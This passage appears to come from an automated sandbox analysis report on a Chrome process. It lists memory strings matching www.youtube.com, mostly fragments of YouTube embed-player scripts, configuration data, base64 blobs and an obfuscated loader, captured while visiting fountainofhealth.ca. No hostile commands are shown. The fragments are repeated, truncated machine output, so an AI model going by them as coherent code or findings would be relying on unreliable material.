n.call(this,34)}),0),0,1,1,0,1,1],u.prototype[CY])),zX=((F_=(KY[u.prototype.FA]=Lb,WC(\":\",5,{get:Lb},u.prototype.l)),u).prototype.NV=void 
0,function(m,A){return(A=pY(78,55,22,94,null,\"error\",\"ad\"))&&m.eval(A.createScript(\"1\"))===1?function(g){return A.createScript(g)}:function(g){return\"\"+g}}(P));((cC=P.trayride||(P.trayride={}),cC.m>40)||(cC.m=41,cC.ad=sa,cC.a=Rj),cC).zfk_=function(m,A,g,T,Z,c,r,l){return[(l=new u(Z,r,A,c,m,T),function(w){return tq(77,5,false,l,w)}),function(w){l.Ef(w)}]};}).call(this);'].join('\\n')));}).call(this);","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":true}unction(w){l.Ef(w)}]};}).call(this);'].join('\\n')));}).call(this);","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":true}/./,Lb=Jq.pop.bind((u.prototype[oB]=[(S.Ef=(S.bS=0,function(){return n.call(this,34)}),0),0,1,1,0,1,1],u.prototype[CY])),zX=((F_=(KY[u.prototype.FA]=Lb,WC(":",5,{get:Lb},u.prototype.l)),u).prototype.NV=void 0,function(m,A){return(A=pY(78,55,22,94,null,"error","ad"))&&m.eval(A.createScript("1"))===1?function(g){return A.createScript(g)}:function(g){return""+g}}(P));((cC=P.trayride||(P.trayride={}),cC.m>40)||(cC.m=41,cC.ad=sa,cC.a=Rj),cC).zfk_=function(m,A,g,T,Z,c,r,l){return[(l=new u(Z,r,A,c,m,T),function(w
                                  Source: chrome.exe, 00000000.00000003.2319531177.000028EC04D45000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2402229430.000028EC04D45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: kFnZW50RGF0YSYmdy5uYXZpZ2F0b3IudXNlckFnZW50RGF0YS5icmFuZHMmJncubmF2aWdhdG9yLnVzZXJBZ2VudERhdGEuYnJhbmRzLmxlbmd0aCl7dmFyIGJyYW5kcz13Lm5hdmlnYXRvci51c2VyQWdlbnREYXRhLmJyYW5kczt2YXIgaT0wO2Zvcig7aTxicmFuZHMubGVuZ3RoO2krKylpZihicmFuZHNbaV0mJmJyYW5kc1tpXS5icmFuZD09PSJGaXJlZm94IilyZXR1cm4gdHJ1ZTtyZXR1cm4gZmFsc2V9fWNhdGNoKGUpe3NldFRpbWVvdXQoZnVuY3Rpb24oKXt0aHJvdyBlO30pfWlmKCF3Lm5hdmlnYXRvci51c2VyQWdlbnQpcmV0dXJuIGZhbHNlO3ZhciB1YT13Lm5hdmlnYXRvci51c2VyQWdlbnQ7cmV0dXJuIHVhLmluZGV4T2YoIkdlY2tvIik+MCYmdWEudG9Mb3dlckNhc2UoKS5pbmRleE9mKCJ3ZWJraXQiKTwwJiZ1YS5pbmRleE9mKCJFZGdlIik8CjAmJnVhLmluZGV4T2YoIlRyaWRlbnQiKTwwJiZ1YS5pbmRleE9mKCJNU0lFIik8MH15dGNzaS5zZXRTdGFydCh3LnBlcmZvcm1hbmNlP3cucGVyZm9ybWFuY2UudGltaW5nLnJlc3BvbnNlU3RhcnQ6bnVsbCk7dmFyIGlzUHJlcmVuZGVyPShkLnZpc2liaWxpdHlTdGF0ZXx8ZC53ZWJraXRWaXNpYmlsaXR5U3RhdGUpPT0icHJlcmVuZGVyIjt2YXIgdk5hbWU9IWQudmlzaWJpbGl0eVN0YXRlJiZkLndlYmtpdFZpc2liaWxpdHlTdGF0ZT8id2Via2l0dmlzaWJpbGl0eWNoYW5nZSI6InZpc2liaWxpdHljaGFuZ2UiO2lmKGlzUHJlcmVuZGVyKXt2YXIgc3RhcnRUaWNrPWZ1bmN0aW9uKCl7eXRjc2kuc2V0U3RhcnQoKTtkLnJlbW92ZUV2ZW50TGlzdGVuZXIodk5hbWUsc3RhcnRUaWNrKX07ZC5hZGRFdmVudExpc3RlbmVyKHZOYW1lLHN0YXJ0VGljayxmYWxzZSl9aWYoZC5hZGRFdmVudExpc3RlbmVyKWQuYWRkRXZlbnRMaXN0ZW5lcih2TmFtZSxmdW5jdGlvbigpe3l0Y3NpLnRpY2soInZjIil9LApmYWxzZSk7aWYoaXNHZWNrbygpKXt2YXIgaXNIaWRkZW49KGQudmlzaWJpbGl0eVN0YXRlfHxkLndlYmtpdFZpc2liaWxpdHlTdGF0ZSk9PSJoaWRkZW4iO2lmKGlzSGlkZGVuKXl0Y3NpLnRpY2soInZjIil9dmFyIHNsdD1mdW5jdGlvbihlbCx0KXtzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7dmFyIG49eXRjc2kubm93KCk7ZWwubG9hZFRpbWU9bjtpZihlbC5zbHQpZWwuc2x0KCl9LHQpfTt3Ll9feXRSSUw9ZnVuY3Rpb24oZWwpe2lmKCFlbC5nZXRBdHRyaWJ1dGUoImRhdGEtdGh1bWIiKSlpZih3LnJlcXVlc3RBbmltYXRpb25GcmFtZSl3LnJlcXVlc3RBbmltYXRpb25GcmFtZShmdW5jdGlvbigpe3NsdChlbCwwKX0pO2Vsc2Ugc2x
0KGVsLDE2KX19KSh3aW5kb3csZG9jdW1lbnQpOwo=","url":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","taburl":"https://fountainofhealth.ca/en","IsInline":false,"Dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmpString found in binary or memory: kejpgkiemlaofpalmlakkmbjdnl/scripts/extension/backgroundV3.js0(-2517715832659448638.6270065637815208423differentDocumentE=https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTRrupalSettings = JSON.parse(settingsElement.textContent); equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF68D000.00000004.08000000.00040000.00000007.sdmpString found in binary or memory: l.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2492760471.000028EC0413C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2491838575.000028EC04094000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: lRpbWVNczogIDQzLjAgfSwgJycpO30=","url":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","taburl":"https://fountainofhealth.ca/en","IsInline":false,"Dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2347774533.000028EC06454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: n false;var ua=w.navigator.userAgent;return ua.indexOf(\"Gecko\")>0&&ua.toLowerCase().indexOf(\"webkit\")<0&&ua.indexOf(\"Edge\")<\n0&&ua.indexOf(\"Trident\")<0&&ua.indexOf(\"MSIE\")<0}ytcsi.setStart(w.performance?w.performance.timing.responseStart:null);var isPrerender=(d.visibilityState||d.webkitVisibilityState)==\"prerender\";var vName=!d.visibilityState&&d.webkitVisibilityState?\"webkitvisibilitychange\":\"visibilitychange\";if(isPrerender){var startTick=function(){ytcsi.setStart();d.removeEventListener(vName,startTick)};d.addEventListener(vName,startTick,false)}if(d.addEventListener)d.addEventListener(vName,function(){ytcsi.tick(\"vc\")},\nfalse);if(isGecko()){var isHidden=(d.visibilityState||d.webkitVisibilityState)==\"hidden\";if(isHidden)ytcsi.tick(\"vc\")}var slt=function(el,t){setTimeout(function(){var n=ytcsi.now();el.loadTime=n;if(el.slt)el.slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2487287792.000028EC03B44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: n(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2331101993.000028EC05434000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: new Set;this.deviceIsAudioOnly=!(z==null||!z.deviceIsAudioOnly);this.II=YK(this.II,B.ismb);this.EM?(F=B.vss_host||"s.youtube.com",F==="s.youtube.com"&&(F=mR(this.yW)||"www.youtube.com")):F="video.google.com";this.Lt=F;nY(this,B,!0);this.lO=new Wo;g.m(this,this.lO);r=z?z.innertubeApiKey:l9("",B.innertube_api_key);C=z?z.innertubeApiVersion:l9("",B.innertube_api_version);F=z?z.innertubeContextClientVersion:l9("",B.innertube_context_client_version);r=g.ek("INNERTUBE_API_KEY")||r;C=g.ek("INNERTUBE_API_VERSION")|| equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2501264021.000028EC068D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: onts.load) {document.fonts.load(\"400 10pt Roboto\", \"E\"); document.fonts.load(\"500 10pt Roboto\", \"E\");}","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmpString found in binary or memory: ource":"var yterr = yterr || true;","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2487287792.000028EC03B44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: ow,document);\n","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2352294336.000028EC048E9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2356027264.000028EC04CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: qFInvW7qQzGlz1v925r6qWB/HQhPblbCnREuLAYUfwakEzjE7ndmB0NvFdWxoiDWlyQ0+ZPDTHQBw9Fm06CKIZaNiIh45kdidIr1UW8danaeEO6+YHG0Rivn/TyM2kI3G7ei4OTvyCRpx+0DXUMA93MJE52kq3k2+ma1U+iTAFC7QJjvH4iLFgXjUHCjE7FBjgyAq/UkkSZsO2fRZ1l2ok5PgkPoYSA/2u346iT//+Yo85JMu26FLhPczPtyFfsVmJKr0gUX9N9F46dWGmXRqgdtHBcT7a4R2SFOKmdAFAOtzCyKPI8oynurTOlccYXros9Tpm4mUVwrpeNa+vRM620o7ob45SQuIAd5kIlH7wvM1rN9lIotDWffHs6zJUrRcYXS3/Xn+QLEg2eTmpeBsthdz+nO0LYo/6W92GsMqbMqUmH9zNrAofNze0j3oYHmllEUcIbliJP2PP9+ywhZU1KjCwppRleCyBrg2hst2eV1sjEQ6cTayJeuTSpg7wlP6COfy2kJ4ZBIAZAkJ/bDiY2KQdFqh/eTD4w9mzMdHC8oBFmE6jyBU5vDlbjqakfe25xnZ8jnC7Qx0h5OQqbw3idhDbX4YlfrmtbtsYBUj5TRf+2rl1SePWUsccX8QNNfDRJ137WM/bxLg163DKv0jDCug/dUe1nzqeAtSezwlgLsc25iBsbJYm5208SkJsCnx5OWoAU2cy2yOi+iBDZ7rCz2H8bQMyKekGqPC5LeVyskel6l1Glhyst4DttMieJJVPVbZNBunD6wNG0eFToQ9FnP4LQ8r6jtAtBNtadLO7ePHbQgdfwZ8oUNtCTB4gnm57xIH3yEPXtflU9spoGv/xfFGgcSWe20VJ1r2jB2nZprzGKeiLg8CWDZqTQlR+kq2UROhydkeL5omaHwNnY2KuvyU/h62tNKBwAuxOED7r2e3qQso3XJNnxqQDTNZ//j71sGx4rIpd11VQKMl/r3IuYL26zynFAEVOoXXb9GI1FEI6+GUS+hRwn84JQaP8vL3eEx4k2xeulRba/gXZF3znpeR22I60k2jV/NZrSTWmOiewUGzX5Ur/EqnRVQoS0xKFdAAlkALOuBzNA/s90DN6aaECp6dmEAKlYj9/dsv3iLKRqoJXVmTAwfONRkqODMe1A9B0M\\u003d\\\",\\\"interpreterSafeUrl\\\":{\\\"privateDoNotAccessOrElseTrustedResourceUrlWrappedValue\\\":\\\"//www.google.com/js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.js\\\"},\\\"serverEnvironment\\\":1}}},\\\"videoFlags\\\":{\\\"playableInEmbed\\\":true,\\\"isCrawlable\\\":true},\\\"previewPlayabilityStatus\\\":{\\\"status\\\":\\\"OK\\\",\\\"playableInEmbed\\\":true,\\\"contextParams\\\":\\\"Q0FJU0FnZ0E\\u003d\\\"},\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER
_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFRO_8nQGG9ORNDSzmkPn-Uo_VeiVfjiwPlQ8ibCpbKGSMTxwT1uceJbejPXkPtxSS6fZPYoJMw_71fzot0Mx1OJrOf2f68RDWLaooVr3MmGoIQB53hXn4k_0fSZd_Yd\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"gobWGqPjLSQ\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"gobWGqPjLSQ\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2352294336.000028EC048E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: qFInvW7qQzGlz1v925r6qWB/HQhPblbCnREuLAYUfwakEzjE7ndmB0NvFdWxoiDWlyQ0+ZPDTHQBw9Fm06CKIZaNiIh45kdidIr1UW8danaeEO6+YHG0Rivn/TyM2kI3G7ei4OTvyCRpx+0DXUMA93MJE52kq3k2+ma1U+iTAFC7QJjvH4iLFgXjUHCjE7FBjgyAq/UkkSZsO2fRZ1l2ok5PgkPoYSA/2u346iT//+Yo85JMu26FLhPczPtyFfsVmJKr0gUX9N9F46dWGmXRqgdtHBcT7a4R2SFOKmdAFAOtzCyKPI8oynurTOlccYXros9Tpm4mUVwrpeNa+vRM620o7ob45SQuIAd5kIlH7wvM1rN9lIotDWffHs6zJUrRcYXS3/Xn+QLEg2eTmpeBsthdz+nO0LYo/6W92GsMqbMqUmH9zNrAofNze0j3oYHmllEUcIbliJP2PP9+ywhZU1KjCwppRleCyBrg2hst2eV1sjEQ6cTayJeuTSpg7wlP6COfy2kJ4ZBIAZAkJ/bDiY2KQdFqh/eTD4w9mzMdHC8oBFmE6jyBU5vDlbjqakfe25xnZ8jnC7Qx0h5OQqbw3idhDbX4YlfrmtbtsYBUj5TRf+2rl1SePWUsccX8QNNfDRJ137WM/bxLg163DKv0jDCug/dUe1nzqeAtSezwlgLsc25iBsbJYm5208SkJsCnx5OWoAU2cy2yOi+iBDZ7rCz2H8bQMyKekGqPC5LeVyskel6l1Glhyst4DttMieJJVPVbZNBunD6wNG0eFToQ9FnP4LQ8r6jtAtBNtadLO7ePHbQgdfwZ8oUNtCTB4gnm57xIH3yEPXtflU9spoGv/xfFGgcSWe20VJ1r2jB2nZprzGKeiLg8CWDZqTQlR+kq2UROhydkeL5omaHwNnY2KuvyU/h62tNKBwAuxOED7r2e3qQso3XJNnxqQDTNZ//j71sGx4rIpd11VQKMl/r3IuYL26zynFAEVOoXXb9GI1FEI6+GUS+hRwn84JQaP8vL3eEx4k2xeulRba/gXZF3znpeR22I60k2jV/NZrSTWmOiewUGzX5Ur/EqnRVQoS0xKFdAAlkALOuBzNA/s90DN6aaECp6dmEAKlYj9/dsv3iLKRqoJXVmTAwfONRkqODMe1A9B0M\\u003d\\\",\\\"interpreterSafeUrl\\\":{\\\"privateDoNotAccessOrElseTrustedResourceUrlWrappedValue\\\":\\\"//www.google.com/js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.js\\\"},\\\"serverEnvironment\\\":1}}},\\\"videoFlags\\\":{\\\"playableInEmbed\\\":true,\\\"isCrawlable\\\":true},\\\"previewPlayabilityStatus\\\":{\\\"status\\\":\\\"OK\\\",\\\"playableInEmbed\\\":true,\\\"contextParams\\\":\\\"Q0FJU0FnZ0E\\u003d\\\"},\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerE
ncryptedContext\\\":\\\"AD5ZzFRO_8nQGG9ORNDSzmkPn-Uo_VeiVfjiwPlQ8ibCpbKGSMTxwT1uceJbejPXkPtxSS6fZPYoJMw_71fzot0Mx1OJrOf2f68RDWLaooVr3MmGoIQB53hXn4k_0fSZd_Yd\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"gobWGqPjLSQ\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"gobWGqPjLSQ\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false}h5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2323720471.000028EC04B35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: qFInvW7qQzGlz1v925r6qWB/HQhPblbCnREuLAYUfwakEzjE7ndmB0NvFdWxoiDWlyQ0+ZPDTHQBw9Fm06CKIZaNiIh45kdidIr1UW8danaeEO6+YHG0Rivn/TyM2kI3G7ei4OTvyCRpx+0DXUMA93MJE52kq3k2+ma1U+iTAFC7QJjvH4iLFgXjUHCjE7FBjgyAq/UkkSZsO2fRZ1l2ok5PgkPoYSA/2u346iT//+Yo85JMu26FLhPczPtyFfsVmJKr0gUX9N9F46dWGmXRqgdtHBcT7a4R2SFOKmdAFAOtzCyKPI8oynurTOlccYXros9Tpm4mUVwrpeNa+vRM620o7ob45SQuIAd5kIlH7wvM1rN9lIotDWffHs6zJUrRcYXS3/Xn+QLEg2eTmpeBsthdz+nO0LYo/6W92GsMqbMqUmH9zNrAofNze0j3oYHmllEUcIbliJP2PP9+ywhZU1KjCwppRleCyBrg2hst2eV1sjEQ6cTayJeuTSpg7wlP6COfy2kJ4ZBIAZAkJ/bDiY2KQdFqh/eTD4w9mzMdHC8oBFmE6jyBU5vDlbjqakfe25xnZ8jnC7Qx0h5OQqbw3idhDbX4YlfrmtbtsYBUj5TRf+2rl1SePWUsccX8QNNfDRJ137WM/bxLg163DKv0jDCug/dUe1nzqeAtSezwlgLsc25iBsbJYm5208SkJsCnx5OWoAU2cy2yOi+iBDZ7rCz2H8bQMyKekGqPC5LeVyskel6l1Glhyst4DttMieJJVPVbZNBunD6wNG0eFToQ9FnP4LQ8r6jtAtBNtadLO7ePHbQgdfwZ8oUNtCTB4gnm57xIH3yEPXtflU9spoGv/xfFGgcSWe20VJ1r2jB2nZprzGKeiLg8CWDZqTQlR+kq2UROhydkeL5omaHwNnY2KuvyU/h62tNKBwAuxOED7r2e3qQso3XJNnxqQDTNZ//j71sGx4rIpd11VQKMl/r3IuYL26zynFAEVOoXXb9GI1FEI6+GUS+hRwn84JQaP8vL3eEx4k2xeulRba/gXZF3znpeR22I60k2jV/NZrSTWmOiewUGzX5Ur/EqnRVQoS0xKFdAAlkALOuBzNA/s90DN6aaECp6dmEAKlYj9/dsv3iLKRqoJXVmTAwfONRkqODMe1A9B0M\\u003d\\\",\\\"interpreterSafeUrl\\\":{\\\"privateDoNotAccessOrElseTrustedResourceUrlWrappedValue\\\":\\\"//www.google.com/js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.js\\\"},\\\"serverEnvironment\\\":1}}},\\\"videoFlags\\\":{\\\"playableInEmbed\\\":true,\\\"isCrawlable\\\":true},\\\"previewPlayabilityStatus\\\":{\\\"status\\\":\\\"OK\\\",\\\"playableInEmbed\\\":true,\\\"contextParams\\\":\\\"Q0FJU0FnZ0E\\u003d\\\"},\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerE
ncryptedContext\\\":\\\"AD5ZzFRO_8nQGG9ORNDSzmkPn-Uo_VeiVfjiwPlQ8ibCpbKGSMTxwT1uceJbejPXkPtxSS6fZPYoJMw_71fzot0Mx1OJrOf2f68RDWLaooVr3MmGoIQB53hXn4k_0fSZd_Yd\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"gobWGqPjLSQ\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"gobWGqPjLSQ\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmpString found in binary or memory: rentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2323134548.000028EC04CE1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321018206.000028EC04C90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: riginsSupported\\\":false}}\",\"video_id\":\"h15NcT6UXh0\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"h15NcT6UXh0\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2506905817.000028EC07D00000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: rimary] PipeControlMessageHandlerhttps://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaXler equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2487287792.000028EC03B44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: ript","source":"var ytcsi={gt:function(n){n=(n||\"\")+\"data_\";return ytcsi[n]||(ytcsi[n]={tick:{},info:{},gel:{preLoggedGelInfos:[]}})},now:window.performance&&window.performance.timing&&window.performance.now&&window.performance.timing.navigationStart?function(){return window.performance.timing.navigationStart+window.performance.now()}:function(){return(new Date).getTime()},tick:function(l,t,n){var ticks=ytcsi.gt(n).tick;var v=t||ytcsi.now();if(ticks[l]){ticks[\"_\"+l]=ticks[\"_\"+l]||[ticks[l]];ticks[\"_\"+l].push(v)}ticks[l]=\nv},info:function(k,v,n){ytcsi.gt(n).info[k]=v},infoGel:function(p,n){ytcsi.gt(n).gel.preLoggedGelInfos.push(p)},setStart:function(t,n){ytcsi.tick(\"_start\",t,n)}};\n(function(w,d){function isGecko(){if(!w.navigator)return false;try{if(w.navigator.userAgentData&&w.navigator.userAgentData.brands&&w.navigator.userAgentData.brands.length){var brands=w.navigator.userAgentData.brands;var i=0;for(;i<brands.length;i++)if(brands[i]&&brands[i].brand===\"Firefox\")return true;return false}}catch(e){setTimeout(function(){throw e;})}if(!w.navigator.userAgent)return false;var ua=w.navigator.userAgent;return ua.indexOf(\"Gecko\")>0&&ua.toLowerCase().indexOf(\"webkit\")<0&&ua.indexOf(\"Edge\")<\n0&&ua.indexOf(\"Trident\")<0&&ua.indexOf(\"MSIE\")<0}ytcsi.setStart(w.performance?w.performance.timing.responseStart:null);var isPrerender=(d.visibilityState||d.webkitVisibilityState)==\"prerender\";var vName=!d.visibilityState&&d.webkitVisibilityState?\"webkitvisibilitychange\":\"visibilitychange\";if(isPrerender){var startTick=function(){ytcsi.setStart();d.removeEventListener(vName,startTick)};d.addEventListener(vName,startTick,false)}if(d.addEventListener)d.addEventListener(vName,function(){ytcsi.tick(\"vc\")},\nfalse);if(isGecko()){var 
isHidden=(d.visibilityState||d.webkitVisibilityState)==\"hidden\";if(isHidden)ytcsi.tick(\"vc\")}var slt=function(el,t){setTimeout(function(){var n=ytcsi.now();el.loadTime=n;if(el.slt)el.slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2361080797.000028EC07D44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ript","source":"window.WIZ_global_data = {\"MUE6Ne\":\"youtube_web\",\"MuJWjd\":false,\"UUFaWc\":\"%.@.null,1000,2]\",\"cfb2h\":\"youtube.web-front-end-critical_20250520.08_p0\",\"fPDxwd\":[],\"iCzhFc\":false,\"nQyAE\":{},\"oxN3nb\":{\"1\":false,\"0\":false,\"610401301\":false,\"899588437\":false,\"725719775\":false,\"513659523\":false,\"568333945\":false,\"1331761403\":false,\"651175828\":false,\"722764542\":false,\"748402145\":false,\"748402146\":false,\"1981196515\":false,\"103340015\":false,\"555019702\":false},\"u4g7r\":\"%.@.null,1,2]\",\"vJQk6\":false,\"xnI9P\":true,\"xwAfE\":true,\"yFnxrf\":2486};","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2483711870.000028EC03624000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2355248038.000028EC062D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ript","source":"window.WIZ_global_data = {\"MUE6Ne\":\"youtube_web\",\"MuJWjd\":false,\"UUFaWc\":\"%.@.null,1000,2]\",\"cfb2h\":\"youtube.web-front-end-critical_20250520.08_p0\",\"fPDxwd\":[],\"iCzhFc\":false,\"nQyAE\":{},\"oxN3nb\":{\"1\":false,\"0\":false,\"610401301\":false,\"899588437\":false,\"725719775\":false,\"513659523\":false,\"568333945\":false,\"1331761403\":false,\"651175828\":false,\"722764542\":false,\"748402145\":false,\"748402146\":false,\"1981196515\":false,\"103340015\":false,\"555019702\":false},\"u4g7r\":\"%.@.null,1,2]\",\"vJQk6\":false,\"xnI9P\":true,\"xwAfE\":true,\"yFnxrf\":2486};","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2484973258.000028EC03774000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: ript","source":"window.yterr=window.yterr||true;window.unhandledErrorMessages={};\nwindow.onerror=function(msg,url,line,opt_columnNumber,opt_error){var err;if(opt_error)err=opt_error;else{err=new Error;err.message=msg;err.fileName=url;err.lineNumber=line;if(!isNaN(opt_columnNumber))err[\"columnNumber\"]=opt_columnNumber}var message=String(err.message);if(!err.message||message in window.unhandledErrorMessages)return;window.unhandledErrorMessages[message]=true;var img=new Image;window.emergencyTimeoutImg=img;img.onload=img.onerror=function(){delete window.emergencyTimeoutImg};var values=\n{\"client.name\":ytcfg.get(\"INNERTUBE_CONTEXT_CLIENT_NAME\"),\"client.version\":ytcfg.get(\"INNERTUBE_CONTEXT_CLIENT_VERSION\"),\"msg\":message,\"type\":\"UnhandledWindow\"+err.name,\"file\":err.fileName,\"line\":err.lineNumber,\"stack\":(err.stack||\"\").substr(0,500)};var parts=[ytcfg.get(\"EMERGENCY_BASE_URL\",\"/error_204?t=jserror&level=ERROR\")];var key;for(key in values){var value=values[key];if(value)parts.push(key+\"=\"+encodeURIComponent(value))}img.src=parts.join(\"&\")};\n","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
